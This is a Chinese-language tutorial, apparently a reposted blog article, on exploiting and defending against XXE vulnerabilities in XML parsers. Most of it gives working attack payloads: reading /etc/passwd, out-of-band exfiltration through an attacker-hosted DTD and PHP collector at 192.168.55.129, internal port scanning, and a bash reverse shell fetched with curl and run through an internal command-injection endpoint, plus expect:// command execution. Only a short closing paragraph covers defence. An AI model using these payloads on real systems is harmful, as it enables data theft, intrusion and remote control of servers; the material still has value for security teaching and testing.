2. 程式人生 > >實戰講解XXE漏洞的利用與防禦策略

實戰講解XXE漏洞的利用與防禦策略

阿新 發佈:2018-03-19
gcd oam copyright 解析xml MQ 包括 實驗 將他 Coding

現在許多不同的客戶端技術都可以使用XMl向業務應用程序發送消息,為了使應用程序使用自定義的XML消息,應用程序必須先去解析XML文檔,並且檢查XML格式是否正確。當解析器允許XML外部實體解析時,就會造成XXE漏洞,導致服務器被攻擊。本期“安仔課堂”,ISEC實驗室的李老師為我們詳細解析XXE漏洞的利用和防禦。

技術分享圖片

一、XML基礎知識

技術分享圖片

XML是用於標記電子文件並使其具有結構性的標記語言,可以用來標記數據、定義數據類型,是一種允許用戶對自己的標記語言進行定義的源語言。XML文檔結構包括XML聲明、DTD文檔類型定義(可選)、文檔元素。

<?xml version="1.0"?>

<!DOCTYPE note [

<!ELEMENT note (to,from,heading,body)>

<!ELEMENT to (#PCDATA)>

<!ELEMENT from (#PCDATA)>

<!ELEMENT heading (#PCDATA)>

<!ELEMENT body (#PCDATA)>]>

<note>

<to>George</to>

<from>John</from>

<heading>Reminder</heading>

<body>Don‘t forget the meeting!</body>

</note>

DTD(文檔類型定義)的作用是定義XML文檔的合法構建模塊。DTD可以在XML文檔內聲明,也可以外部引用。

內部聲明DTD:<!DOCTYPE 根元素 [元素聲明]>;

引用外部DTD:<!DOCTYPE 根元素 SYSTEM "文件名">或者<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">;

DTD實體是用於定義引用普通文本或特殊字符的快捷方式的變量,可以內部聲明或外部引用。

內部聲明實體:<!ENTITY 實體名稱 "實體的值">;

引用外部實體:<!ENTITY 實體名稱 SYSTEM "URI">。

技術分享圖片

二、XML外部實體

技術分享圖片

使用XML主要是為了使兩個采用不同技術的系統可以通過XML進行通信和交換數據。而有些XML文檔包含system標識符定義的“實體”,這些XML文檔會在DOCTYPE頭部標簽中呈現。這些定義的“實體”能夠訪問本地或遠程的內容。比如,下面的XML文檔樣例就包含了XML“實體”:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "file://etc/passwd" >]>

<root>

<name>&XXE;</name>

</root>

在上面的代碼中,XML外部實體“XXE”被賦予的值為:file://etc/passwd。在解析XML文檔的過程中,實體“XXE”的值會被替換為URI(file://etc/passwd)內容值(也就是passwd文件的內容)。關鍵字“SYSTEM”會告訴XML解析器,“XXE”實體的值將從其後的URI中讀取。

技術分享圖片

 三、XML外部實體攻擊

技術分享圖片


當XML允許引用外部實體,關鍵字“SYSTEM”會令XML解析器從URI中讀取內容,並允許它在XML文檔中被替換。因此,攻擊者可以通過實體將他自定義的值發送給應用程序,然後讓應用程序去呈現。

簡單來說,攻擊者強制XML解析器去訪問攻擊者指定的資源內容(可能是系統上本地文件亦或是遠程系統上的文件)。而不同的XML解析器,對外部實體有不同的處理規則。

在PHP中默認處理的函數為xml_parse和simplexml_load,xml_parse的實現方式為expat庫,默認情況不會解析外部實體,而simplexml_load默認情況下會解析外部實體,造成安全威脅。除PHP外,在Java、Python等處理XML的組件及函數中,都可能存在此問題。

如何判斷是否存在XML外部實體攻擊?那就是尋找那些接受XML作為輸入內容的端點,而有些端點可能並不是那麽明顯,比如一些僅使用JSON去訪問服務的客戶端,可以通過修改HTTP的請求或修改Content-Type頭部字段等方法,然後看應用程序的響應,看程序是否解析了發送的內容,如果解析了,那麽就可能存在XXE攻擊漏洞。

技術分享圖片

四、XXE漏洞測試

技術分享圖片

借助XXE,攻擊者可以實現任意文件讀取,DDOS拒絕服務攻擊以及代理掃描內網等。

1.任意文件讀取漏洞測試

當有回顯時,直接利用payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "file://etc/passwd" >]>

<root>

<name>&XXE;</name>

</root>

可以進行任意文件讀取文件:

技術分享圖片

圖1

當無回顯時,引用遠程服務器上的XML文件讀取文件:

將以下get.php,1.xml保存到自己的WEB服務器下

get.php:

<?php

$xml=$_GET[‘xml‘];

$base=base64_decode($xml);

file_put_contents(‘data.txt‘, $base);

?>

1.xml:

<!ENTITY % payloadSYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">

<!ENTITY % int "<!ENTITY % trick SYSTEM ‘http://192.168.55.129/get.php?xml=%payload;‘>">

%int;

%trick;

直接發送payload:

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://192.168.55.129/1.xml">

%remote;]>

<root/>

就能讀取任意文件並把數據保存到本地的data.txt文件裏:

技術分享圖片

圖2

2.探測內網端口和網站

有回顯時,直接發送payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "http://127.0.0.1:80" >]>

<root>

<name>&XXE;</name>

</root>

端口存在時會返回頁面報錯信息:

技術分享圖片

圖3

端口不存在時,返回無法連接的報錯信息:

技術分享圖片

圖4

無回顯時,修改1.xml文件,把file協議修改為需要掃描的IP:

<!ENTITY % payloadSYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.55.129">

<!ENTITY % int "<!ENTITY % trick SYSTEM ‘http://192.168.55.129/get.php?xml=%payload;‘>">

%int;

%trick;

直接發送payload:

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://192.168.55.129/1.xml">

%remote;]>

<root/>

當端口存在web頁面,也可獲得內網網站的的頁面源代碼:

技術分享圖片

圖5

3.攻擊內網網站

若內網網站存在命令執行漏洞時:

將以下bash.txt保存至自己的WEB服務器下:

bash.txt:

bash -i >& /dev/tcp/192.168.55.129/8877 0>&1

發送以下payload獲取bash.txt文件:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "http://127.0.0.1/hack.php?1=curl%20-o%20/tmp/1.txt%20192.168.55.129/bash.txt" >]>

<root>

<name>&XXE;</name>

</root>

技術分享圖片

圖6

在本機監聽一個端口:

技術分享圖片

圖7

發送一下payload,獲得反彈shellcode命令:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "http://127.0.0.1/hack.php?1=/bin/bash%20/tmp/1.txt" >]>

<root>

<name>&XXE;</name>

</root>

技術分享圖片

圖8

4.執行系統命令

若安裝expect擴展的PHP環境裏還可以直接執行系統命令,其他協議也有可能可以執行系統命令。

直接執行payload:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE XXE [

<!ELEMENT name ANY >

<!ENTITY XXE SYSTEM "expect://id" >]>

<root>

<name>&XXE;</name>

</root>

技術分享圖片

五、防禦XXE攻擊

技術分享圖片

防禦XXE攻擊主要有三方面:一是檢查所使用的底層XML解析庫,默認禁止外部實體的解析二是若使用第三方應用代碼需要及時升級補丁;三是對用戶提交的XML數據進行過濾,關鍵詞:<!DOCTYPE和<!ENTITY或者SYSTEM和PUBLIC等。

實戰講解XXE漏洞的利用與防禦策略

相關推薦

實戰講解XXE漏洞利用防禦策略

gcd oam copyright 解析xml MQ 包括 實驗 將他 Coding 現在許多不同的客戶端技術都可以使用XMl向業務應用程序發送消息,為了使應用程序使用自定義的XML消息,應用程序必須先去解析XML文檔,並且檢查XML格式是否正確。當解析器允許XML外部實體

聽補天漏洞審核專家實戰講解XXE漏洞

實戰 加載 origin 課程 ext 小天 分享 java版 inline 對於將“挖洞”作為施展自身才幹、展現自身價值方式的白 帽 子來說,聽漏洞審核專家講如何挖掘並驗證漏洞,絕對不失為一種快速的成長方式! XXE Injection(XML External Enti

XXE漏洞攻擊防禦

swe factor 參數 tor 類別 bash pin tps start 轉自https://www.jianshu.com/p/7325b2ef8fc9 0x01 XML基礎 在聊XXE之前,先說說相關的XML知識吧。 定義 XML用於標記電子文件使其具有結

Redis漏洞利用防禦

Redis漏洞利用與防禦Redis漏洞利用與防禦simeonRedis在大公司被大量應用,通過筆者的研究發現,目前在互聯網上已經出現Redis未經授權病毒似自動攻擊,攻擊成功後會對內網進行掃描、控制、感染以及用來進行挖礦、勒索等惡意行為,早期網上曾經分析過一篇文章“通過redis感染linux版本勒索病毒的服

淺談XXE漏洞攻擊防禦——本質上就是注入,盜取資料用

淺談XXE漏洞攻擊與防禦 from:https://thief.one/2017/06/20/1/ XML基礎 在介紹xxe漏洞前,先學習溫顧一下XML的基礎知識。XML被設計為傳輸和儲存資料,其焦點是資料的內容,其把資料從HTML分離,是獨立於軟體和硬體的資訊傳輸工具。 XML文件結

實戰getshell新姿勢-SSRF漏洞利用getshell實戰

實戰getshell新姿勢-SSRF漏洞利用與getshell實戰 一、什麼地方最容易出現SSRF 二、SSRF漏洞危害 三、SSRF 神器 Curl 的使用 四、最常用的跳轉繞過 五、Python + SSRF 實現埠掃描

從WebLogic看反序列化漏洞利用防禦

0x00 前言 上週出的 WebLogic 反序列漏洞,跟進分析的時候發現涉及到不少 Java 反序列化的知識,然後借這個機會把一些 Java 反序列化漏洞的利用與防禦需要的知識點重新捋一遍,做了一些測試和除錯後寫成這份報告。文中若有錯漏之處,歡迎指出。 0x01 J

OrientDB遠程代碼執行漏洞利用分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼

騰訊大牛親授 Web 前後端漏洞分析防禦技巧

第1章 課程介紹介紹安全問題在web開發中的重要性,並對課程整體進行介紹1-1 Web安全課程介紹1-2 專案總覽 第2章 環境搭建本章節我們會搭建專案所需要的環境2-1 環境搭建上2-2 環境搭建下 第3章 前端XSS系統介紹XSS攻擊的原理、危害,以真實案例講解XSS帶來過的損失,最後以實戰程式碼講解

phpMyAdmin漏洞利用安全防範

phpMyAdmin漏洞利用與安全防範   simeon Freebuf最近刊發了一篇文章《下一個獵殺目標:近期大量MySQL資料庫遭勒索攻擊》,連結地址http://www.freebuf.com/news/127945.html,筆者在對phpMyAdmin漏洞進行研

網站安全檢測 漏洞檢測 對thinkphp通殺漏洞利用修復建議

thinkphp在國內來說,很多站長以及平臺都在使用這套開源的系統來建站,為什麼會這麼深受大家的喜歡,第一開源,便捷,高效,生成靜態化html,第二框架性的易於開發php架構,很多第三方的外掛以及第三方的開發公司較多,模板可以自定義設計,在thinkphp的基礎上可以開發很多

Web 前後端漏洞分析防禦技巧

pan style href 防禦 漏洞分析 ron 網盤 html strong 騰訊大牛親授 Web 前後端漏洞分析與防禦技巧 項目終於上線了,卻面臨安全威脅,你怕不怕?本課程以一個實戰項目演示XSS、CSRF、點擊劫持、SQL註入等主要安全問題和防禦措施,打消你對項目

騰訊大牛教你web前後端漏洞分析防禦-XSS

所謂的安全,其實是指兩個方面 私密性:不被非法獲取和利用(Get) 程式碼層面 架構層面 運維層面 問題 使用者身份被盜用 使用者密碼洩露 使用者資料被盜取 網站資料庫洩露 其他 可靠性:不丟失不損壞不被篡改 搭建測試環境 測試環境是用Koa搭

CSRF攻擊防禦策略

CSRF攻擊 目錄 1 CSRF攻擊簡介 1 1.1 什麼是CSRF 1 1.2 CSRF可以做什麼 1 1.3 CSRF漏洞現狀 1 2 CSRF的攻擊原理 1 2.1 CSRF攻擊原理 1 2.2 CSRF攻擊例項 2 2.3 CSRF攻擊物件 3 3 CSRF的防禦策

xxe漏洞的學習利用總結

前言 對於xxe漏洞的認識一直都不是很清楚,而在我為期不長的挖洞生涯中也沒有遇到過,所以就想著總結一下,撰寫此文以作為記錄,加深自己對xxe漏洞的認識。 xml基礎知識 要了解xxe漏洞,那麼一定得先明白基礎知識,瞭解xml文件的基礎組成。 XML用於標記電子檔案使

IntelAMT 固件密碼繞過登錄漏洞分析實戰

英特爾 管理工具 系統管理員 計算機 卡洛斯 IntelAMT 固件密碼繞過登錄漏洞分析與實戰Byantian365.com simeon1.1漏洞簡介 2017年5月1日,英特爾公布了AMT漏洞(INTEL-SA-00075),但該漏洞的細節未公開。2017年5月5日,Tenabl

Docker入門實戰講解

pau spa 個人 開發人員 1.0 創建 依賴 之前 講解 簡述 Docker 是一個開源的應用容器引擎,讓開發者可以打包他們的應用以及依賴包到一個可移植的容器中,然後發布到任何流行的 Linux 機器上,也可以實現虛擬化。容器是完全使用沙箱機制,相互之間不會有任何接口

Java反序列化漏洞的挖掘、攻擊防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

何查找網站漏洞文件任意查看漏洞詳情利用

url post方式 權限 之前 工具 url編碼 編輯 系統 需要 在對網站程序代碼的安全檢測當中,網站文件任意查看漏洞在整個網站安全報告中屬於比較高危的網站漏洞,一般網站裏都會含有這種漏洞,尤其平臺,商城,交互類的網站較多一些,像普通權限繞過漏洞,導致的就是可以查看到網

linux_kernel_uaf漏洞利用實戰

driver lib 指向 init 變化 ret paste gadget 開啟 前言 好像是國賽的一道題。一個 linux 的內核題目。漏洞比較簡單,可以作為入門。 題目鏈接: 在這裏 正文 題目給了3個文件 分配是 根文件系統 , 內核鏡像, 啟動腳本。解壓運行 b